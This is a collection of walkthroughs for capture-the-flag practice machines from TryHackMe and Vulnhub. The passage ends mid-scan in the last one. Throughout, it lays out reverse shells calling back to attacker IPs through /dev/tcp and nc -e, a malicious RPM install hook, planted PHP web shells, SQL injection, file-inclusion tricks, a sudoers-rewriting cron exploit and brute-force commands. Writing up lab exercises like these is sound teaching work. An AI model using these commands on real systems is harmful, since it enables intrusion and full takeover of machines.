Daily Bugle – TryHackMe Machine Writeup

Today, we will root the Daily Bugle Machine from TryHackMe.

After deploying the machine, We are greeted with the first question.

Access the Server, Who robbed the bank?

Pretty straight-forward.

Answer is there.

The next question says, the CMS is Joomla. We need to find the version.

Upon a Google search, I ended up here.

So, we can read the version by visiting

http://10.10.249.33/administrator/manifests/files/joomla.xml

We got the version too.

This version of Joomla has an SQL injection vulnerability. Lets look up.

https://www.exploit-db.com/exploits/42033

We can try with SQL Map, But a simpler pyhon script is available.

https://github.com/XiphosResearch/exploits/tree/master/Joomblah

Lets run this on our target.

[email protected]:~/ex$ python joomblah.py http://10.10.249.33

We got the admin password hashes!

Lets crack this with John.

[email protected]:/home/kali/ex# john -w=/usr/share/wordlists/rockyou.txt jonah.txt -form=bcrypt

It took 40 minutes to get the hash cracked in my VM.

Lets login now.

http://10.10.249.33/administrator/

With the password we just found.

Once We are inside, Go to templates > Templates and click on name of the active template.

Select the Index.php file and paste the reverse shell php script. Download the file from here and update with our IP.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Now listen from our machine port 4444 and load the main page of the site.

[email protected]:~/ex$ nc -nlvp 4444
listening on [any] 4444 ...

We got a reverse shell!

Let’s find the user flag now. First find the users.

sh-4.2$ cat /etc/passwd

Lets have a look at jjameson’s home directory.

But we dont have the permission for that.

Lets find some other way.

Have a look at /var/www/html/configuration.php file.

Lets try this password for the user.

bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu

[[email protected] html]$ 

Success!

The user can run yum without password on the machine.

We can read the user flag now.

We can install any package with yum as root user. Have a look at the following page.

https://gtfobins.github.io/gtfobins/yum/

Let us create a specially crafted RPM package and install in the target.

Lets follow this guide for the process.

https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2

[email protected]:/home/kali/ex# git clone https://github.com/jordansissel/fpm
[email protected]:/home/kali/ex/fpm# gem install fpm
[email protected]:/home/kali/ex/fpm# apt-get install rpm

Now create a file named root.sh for reverse shell.

#! /bin/bash
bash -i >& /dev/tcp/10.9.42.115/9999 0>&1

Now create the RPM Package.

[email protected]:/home/kali/ex# fpm -n root -s dir -t rpm -a all --before-install root.sh /home/kali/ex

Now, Lets transfer the file to the target machine and install the package.

[email protected]:/home/kali/ex# python -m SimpleHTTPServer 222

and in the target,

[[email protected] ~]$ wget http://10.9.42.115:222/root-1.0-1.noarch.rpm

Listen for a connection at port 9999 in our attacker machine.

[email protected]:/home/kali/ex# nc -nlvp 9999
listening on [any] 9999 ...

and install the package in the target.

[[email protected] ~]$ sudo yum localinstall -y root-1.0-1.noarch.rpm

We got the root shell!

Lets read the root flag now.

Done!!

Lin.Security: 1 Vulnhub Machine Walkthrough

Today, We will root Lin.Security:1 Machine from Vulnhub. This is a simple and straight forward boot2root machine.

Lets start by finding the IP.

[email protected]:~# nmap -sS 192.168.18.0/24

Got the IP and open ports.

NFS is running on port 2019. Lets enumerate it.

[email protected]:~# nmap -sV --script=nfs-* 192.168.18.102

We can mount /home/peter to our machine.

[email protected]:/mnt# mkdir lin
[email protected]:/mnt# mount 192.168.18.102:/home/peter /mnt/lin
[email protected]:/mnt# ls -la

In order to login to the machine, we can place our ssh public key in .ssh directory

(refer this article to learn how to create an ssh key)

Copy our public key (id_rsa.pub) to /tmp directory.

[email protected]:/mnt# cd /root/.ssh
[email protected]:~/.ssh# ls -la
total 20
drw-------  2 root root 4096 Jul  2 07:25 .
drwx------ 35 root root 4096 Aug 17 07:17 ..
-rw-------  1 root root 2590 Aug 12 08:35 id_rsa
-rw-r--r--  1 root root  563 Aug 12 08:35 id_rsa.pub
-rw-r--r--  1 root root 3322 Aug 13 06:47 known_hosts
[email protected]:~/.ssh# cp id_rsa.pub /tmp

make a directory named .ssh in the directory we just mounted.

[email protected]:/mnt/lin# mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied

We dont have the permission to create the directory.

Lets create a user with uid 1001 to do this.

[email protected]:~# useradd -u 1001 peter

Now change the ownwership of /tmp/id_rsa.pub to peter

[email protected]:~/.ssh# cd /tmp
[email protected]:/tmp# chown peter:peter id_rsa.pub
[email protected]:/tmp# 

Lets copy the file to the mounted directory now. First lets change the user to peter and copy the file.

[email protected]:/mnt/lin# su peter
$ whoami
peter
$ mkdir .ssh
$ cd .ssh
$ cp /tmp/id_rsa.pub authorized_keys

We have copied our public key file to /tmp/.ssh/authorized_keys

Now, Let’s try to login as peter through ssh.

[email protected]:~# cd .ssh
[email protected]:~/.ssh# ssh [email protected]

We are now logged in as peter. Lets see what all we can do here as a privileged user.

[email protected]:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace

We can run /usr/bin/strace as root.

Can we escalate our privileges with this?

GTFOBins says yes!

Lets try.

[email protected]:~$ sudo strace -o /dev/null /bin/sh
# whoami
root

We got the root!

This was a comparitively easier machine. Lets root another machine next day!

PwnLab: init, Vulnhub Machine Walkthrough

Lets root Pwnlab: init Machine from Vulnhub today.

Start by finding out the IP through nmap.

nmap -sn 192.168.18.0/24

We have the IP now, 192.168.18.100

Time for a deeper scan.

nmap -p- -A -T5 -sV -O --script vuln  192.168.18.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 08:35 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.100
Host is up (0.00097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.100
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.100:80/?page=login
|     Form id: user
|_    Form action: 
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-server-header: Apache/2.4.10 (Debian)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.10: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3583   5.0     https://vulners.com/cve/CVE-2014-3583
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
111/tcp   open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38626/tcp   status
|   100024  1          39233/udp6  status
|   100024  1          52116/udp   status
|_  100024  1          57067/tcp6  status
3306/tcp  open  mysql   MySQL (blocked - too many connection errors)
38626/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:CF:29:7D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.97 ms 192.168.18.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 372.01 seconds

We have a website running on the server. Lets have a look.

A login Page, Lets try SQL Injection.

Unfortunately it didn’t work. But, Have a look at the login page URL.

http://192.168.18.100/?page=login

Is there an LFI?

I tried but could’nt find any. Then I came across this article.

https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/

Lets try this on config.php.

http://192.168.18.100/?page=php://filter/convert.base64-encode/resource=config

We got something in base64.

Lets decode this with https://www.base64decode.org/

Now we have the credentials to login to the MySQL server.

Lets try to login.

mysql -u root -h 192.168.56.101 -pH4u%QJ_H99

I got an error at first, but fixed the issue with a reboot of the VM.

Lets read the data now.

show databases;

Lets find the tables and the data inside them.

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.005 sec)

Here, we have 3 users. Looks like the password is base64 encoded. Lets decode kent’s password.

It is JWzXuBJJNy.

Lets login as kent.

Lets try to upload a php shell.

Lets try to send this as jpg with Burp.

Change the filename to photo.gif, content type to image/gif and add GIF87a in the first line.

We can find our file location in response filed in Burp.

Our file is uploaded, but we cant read the file. But read the index.php through the above method.

Here, a ‘lang‘ cookie is added to load ‘en.lang.php‘ file.

Lets try changing the value to something else.

Go to Firefox Preferences > Web Developer > Storage. Add + button at the top right to add a cookie.

Cookie name: lang and value: ../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif

and now.

We got the file included.

Now lets open a reverse shell with netcat. Enter this command in the page.

nc -nv 192.168.18.99 4444 -e /bin/bash

We got a connection.

Now, We have the passwords for three users. Lets examine their home directories.

Nothing special here.

Mike’s password doesnt work. Letr try kane.

There is a file owned by mike. Lets open.

Ah! Couldnt read. What kind of file this is?

Executable. Lets try running.

[email protected]:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory

This executable tries to read msg.txt from mike’s home directory. Means the executable cat have access to mike’s home directory and we don’t have. Right?

What about changing the PATH variable and running /bin/bash with the same privileges as cat? Let’s try.

[email protected]:~$ echo "/bin/bash" > /tmp/cat
echo "/bin/bash" > /tmp/cat
[email protected]:~$ chmod +x /tmp/cat
chmod +x /tmp/cat
[email protected]:~$ PATH=/tmp:$PATH
PATH=/tmp:$PATH

Now let’s run the executable file.

We are mike now!

Lets have a look at mike’s home directory.

There’s a file called msg2root.

We are sending a message to root. So as the previous file, an executable have access to root folder too.

Lets try another method.

We are root.

Lets read the flag now. Before that we need to copy the real cat file to our /tmp/cat.

Cheers!

Mr Robot 1 Vulnhub Machine Walkthrough

Today we will root Mr Robot 1 Machine from Vulnhub.

As usual, First find the IP of the machine.

nmap -sn 192.168.18.0/24

Now Lets do a scan on the machine.

nmap -sV -O -A -T5 192.168.18.96

There is a web server running on port 80. Lets have a look.

Cool, Lets do a directory scan with Gobuster.

[email protected]:~# gobuster dir -u 192.168.18.96 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt 

We have wp-content, wp-admin and wp-login in the server. So we can guess that a WordPress installation is there.

Before that, lets have a look at robots.txt.

This robots file blocks fsocity.dic and key-1-of-3.txt.

fsocity.dic is a wordlist. Lets save it so that we can use that for fuzzing later.

This is key-1-of-3. That means we need to find 2 more keys.

Now we need to find the username and password. Go to the login page and try usual combinations.

Now lets try to find out usernames from our .dic file using Burpsuite.

Capture the request and send it to intruder.

Click clear and select the username field as position to insert the payload.

Now run this command to remove the repeating lines in the file fsocity.dic

sort fsocity.dic | uniq > test.txt

The first file is 6MB and our new file is just 94KB. Use this file as payload list in Burp.

Now load the file and start attack. The attack will be faster in paid versions of Burpsuite.

The usual response length is 4145 if the username is wrong. But then the username is elliot the response length is 4196. Lets try that in browser.

The username elliot is right. Now we need to find the password using the same method.

Get the login request, Send to intruder, and use the same file for fuzzing.

We got the password too. ER28-0652.

and logged in.

Now we need a reverse shell. Lets do that by editing a page template.

Visit the following page and select 404 Template.

http://192.168.18.96/wp-admin/theme-editor.php

This page is shown in case of a 404 error in this WordPress installation. If we add our backdoor script in this template and try to load a non-existing page, we can get a reverse shell. Paste the contents of following file there.

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

and update the IP and port with your attacker IP and listening port number.

Lets get a shell from this page first listen from kali with nc and connect from the server.

nc -nlvp 4444

Visit any non existent page in the site

http://192.168.18.96/melbin.in

We got a shell.

When we look at the home folder of user robot. We can find a file named password-raw-md5.

We also have a the key 2 of 3 but we dont have the read permission.

Lets open the password.raw-md5 file.

Lets copy the md5 hash and search online.

https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b

We have the password of robot. Lets change user to robot now. But we need to run that from a TTY shell. Use this command.

python -c 'import pty; pty.spawn("/bin/sh")'

We have nmap in the machine, we can verify it by

which nmap

Now have a look at https://gtfobins.github.io/gtfobins/nmap/#sudo to learn how to do privilege escalation with nmap.

lets try this.

We got root access now. Lets read the second flag.

What about third flag?

It is here.

Lets read that too.

So, we have completed Mr. Robot 1.

Cheers!

Skytower 1 Vulnhub Machine Walkthrough

Today, Lets work on the Skytower 1 Vulnhub Machine.

Lets find the IP first.

[email protected]:~# nmap -sn 192.168.18.0/24
Nmap scan report for 192.168.18.94
Host is up (0.0086s latency).
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

So, our IP is 192.168.18.94. Lets do a simple port scan.

[email protected]:~# nmap -O -sV 192.168.18.94

There is. web server running on port 80. Lets have a look.

A login page, Lets try SQL Injection.

We can use Burpsuite for this. Download a list of payloads to be checked from here.

https://github.com/melbinkm/SQL-Injection-Payloads/blob/master/sqli_auth.list

Now lets capture the request in Burp

Then, Right click and send to Intruder.

Set attack type to ‘pitchfork‘ and make sure that the email and password fields are selected.

Now, Go to payloads and load the payload list we downloaded to first and second payloads.

and click Start Attack.

When the attack goes on, we can notice the response length of some requests are 231 and some are 1838. The ones with 1838 are the ones we want. They are successful logins.

Here lets try '-' as email and password.

and, we’re in!

We have the SSH login credentials now. Lets try logging in.

Its not getting connected. But remember, we have a Squid proxy opened on port 3128.

Lets try connecting through it.

add the following line to /etc/proxychains.conf

http 192.168.18.94 3128

Now, lets try connecting to the machine.

We logged in to the server, and logged out automatically. lets try running a command upon login.

[email protected]:~# proxychains ssh -t [email protected] ls -la

Ok, So our command is working. Still we are getting logged out. Lets try to get a reverse shell through this.

First check if netcat is present there.

Yes, Now lets spawn a reverse shell.

[email protected]:~# nc -nlvp 4444
listening on [any] 4444 ...

We have executed the command and got a reverse shell in our kali machine.

We are in, now lets have a look at /etc/passwd

There are two more users, sara and william.

Lets try to find out the passwords of sara and william too and log in.

username: [email protected]
password: '-'

username: [email protected]
password: '-'

We got the password of sara. Lets try logging in.

[email protected]:~# proxychains ssh -t [email protected] nc 192.168.18.92 4444 -e /bin/bash

We got access to sara’s account.

run sudo -l ro view sara’s sudo permissions.

So, Sara can use cat and ls in /accounts/ directory with root permissions.

According to this page, https://superuser.com/questions/355029/how-to-automatically-run-commands-on-ssh-login

we can execute a script upon ssh login if we place that in .bashrc file.

Lets have a look.

cat .bashrc

Lets try removing this and login again.

rm .bashrc

Logged in.

Now we can use sudo ls /accounts/ on the machine with root permissions.

What about sudo ls /accounts/../ ? Lets try

Using this method, we can go back to /root directory and find a flag.txt file there.

Now use cat to read the file.

sudo cat /accounts/../root/flag.txt

We got the root password now. Lets try to be root using su command.

We are root!

Hacklab Vulnix, Vulnhub Machine Walkthrough

Today we are working on the Vulnix machine from Vulnhub.

Lets find the IP first.

nmap -sN 192.168.18.92/24

We got the IP, 192.168.18.93

Lets do a detailed scan now.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 04:47 EDT

Nmap scan report for 192.168.18.93
Host is up (0.0050s latency).
Not shown: 65518 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 
25/tcp    open  smtp       Postfix smtpd
 
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| 
|_sslv2-drown: 
79/tcp    open  finger     Linux fingerd
|
110/tcp   open  pop3       Dovecot pop3d
|_
|  
|_sslv2-drown: 
111/tcp   open  rpcbind    2-4 (RPC #100000)
|
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      33365/udp6  mountd
|   100005  1,2,3      47947/tcp6  mountd
|   100005  1,2,3      56458/udp   mountd
|   100005  1,2,3      57756/tcp   mountd
|   100021  1,3,4      39547/udp   nlockmgr
|   100021  1,3,4      47952/tcp6  nlockmgr
|   100021  1,3,4      53508/udp6  nlockmgr
|   100021  1,3,4      53795/tcp   nlockmgr
|   100024  1          38357/udp   status
|   100024  1          39369/tcp   status
|   100024  1          48082/udp6  status
|   100024  1          57952/tcp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
|_
512/tcp   open  exec       netkit-rsh rexecd

513/tcp   open  login?

514/tcp   open  tcpwrapped
|
993/tcp   open  ssl/imaps?
|_

995/tcp   open  ssl/pop3s?

2049/tcp  open  nfs_acl    2-3 (RPC #100227)

39369/tcp open  status     1 (RPC #100024)
 
42985/tcp open  mountd     1-3 (RPC #100005)
 
48267/tcp open  mountd     1-3 (RPC #100005)
 
53795/tcp open  nlockmgr   1-4 (RPC #100021)
 
57756/tcp open  mountd     1-3 (RPC #100005)
 
MAC Address: 08:00:27:67:74:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   4.97 ms 192.168.18.93

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.55 seconds

finger is running on port 79. Lets do some user enumeration first.

We got a few users.

Lets try bruteforcing the logins.

make a text file with usernames.

Lets run medusa with rockyou.txt

medusa -h 192.168.18.93 -U vulnix_users.txt -P rockyou.txt -e ns -f -M ssh > medusa.txt

Let’s try to enumerate further when the brute forcing is going on in the background.

From the detailed scan above, we can see thet NFS is running on port 2049. Lets go deeper.

nmap -sV --script=nfs-* 192.168.18.93

We have an NFS share at /home/vulnix. Lets try to mont it to our machine.

But, we dont have permission to open it.

Lets go back to our medusa and check the results.

So, the password for user is letmein.

Lets try to login to the machine.

Lets now check the /etc/passwd file and get details for vulnix user.

If we add this user to our system with same uid as 2008, we can read the mounted directory. Right? Lets try.

useradd -u 2008 vulnix
su vulnix
cd /tmp/vulnix
ls -la

We got access to vulnix’s home folder.

If we place our id_rsa.pub key in /mnt/vulnix/.ssh/authorized_keys we can login without passsword.

Create a key, if you have not created yet.

ssh-keygen -t rsa

Now add the public key to /tmp. and change the owner to vulnix.

add the file to /mnt/vulnix/.ssh/authorized_keys

Now we can login as vulnix on the target machine without password.

Lets see what can we do with this user.

sudo -l

We can edit the /etc/exports file as root without password.

According to this article, https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ , the *(rw,root_squash) is used to prevent file access as root. Since we have edit acces to this file. we can change that.

Made the change and saved.

We need to restart NFS to bring our change into action, since we dont have root access, lets restart the machine.

Now remount the share and copy our /bin/bash to the mounted directory.

[email protected]:/mnt/vulnix# cp /bin/bash .

The file is present in the home folder of vulnix, with owner as root. Lets try to run that.

./bash
whoami
root

So we got the root access in Vulnix too. Next day next Machine!

SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

Get the IP first.

nmap -sP 192.168.18.0/24

The IP address is 192.168.18.90.

Lets do a detailed scan now

[email protected]:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6     https://vulners.com/cve/CVE-2013-4559
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2013-4508   5.8     https://vulners.com/cve/CVE-2013-4508
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|       CVE-2011-4362   5.0     https://vulners.com/cve/CVE-2011-4362
|_      CVE-2013-4560   2.6     https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.18.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

We have nothing interesting in index.php.

but there is a page /test

Lets use CURL and check allowed HTTP Options.

curl -v -X OPTIONS http://192.168.18.90/test

Here PUT is allowed. Lets try uploading a php shell there.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Lets download this and PUT to the server.

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz

Edit the IP and PORT in the script.

Start a netcat listener in our machine

nc -nlvp 5555

and upload to server

curl --upload-file  shell.php -v --url http://192.168.18.90/test/shell.php -0 --http1.0

Now try to access this in the server.

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110) 

Looks like a problem with firewall. Lets try on port 443. Edit the file and re-upload to target.

We gota connection from the server. Great.

Lets now try to escalate privileges.

First get a TTY shell with the following command

python -c 'import pty;pty.spawn("/bin/bash")'

Lets have a look at the cron jobs.

ls -l /etc/cron.daily

There is a cron job with chkrootkit. We have a vulnerability for chkrootkit here.

https://www.exploit-db.com/exploits/33899

chkrootkit will run any executable placed as /tmp/update with root privileges.

Lets create the file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

Here our cron job runs daily. So we need to wait till next time the job runs. Use this command to check if the file is updated.

ls -la /etc/sudoers

After a few minutes the /etc/sudoers file got updated.

Now check our privileges.

We are root now. Lets find the flag.

SickOS v2 conquered! Next day next machine!

VulnOSv2 Vulnhub Machine Walkthrough

Today, We are working on VulnOSv2 machine from Vulnhub.

First lets find the IP.

nmap 192.168.18.0/24

So, 192.168.18.88 is our machine’s IP.

Lets do a detailed scan now.

[email protected]:~# nmap -p- -A -T5 -sV -O --script vuln 192.168.18.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 12:44 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.88
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.88
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/5
|     Form id: commerce-cart-add-to-cart-form-2
|     Form action: /jabc/?q=node/5
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/6
|     Form id: commerce-cart-add-to-cart-form-3
|     Form action: /jabc/?q=node/6
|     
|     Path: http://192.168.18.88:80/jabc/?q=node/4
|     Form id: commerce-cart-add-to-cart-form-1
|_    Form action: /jabc/?q=node/4
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
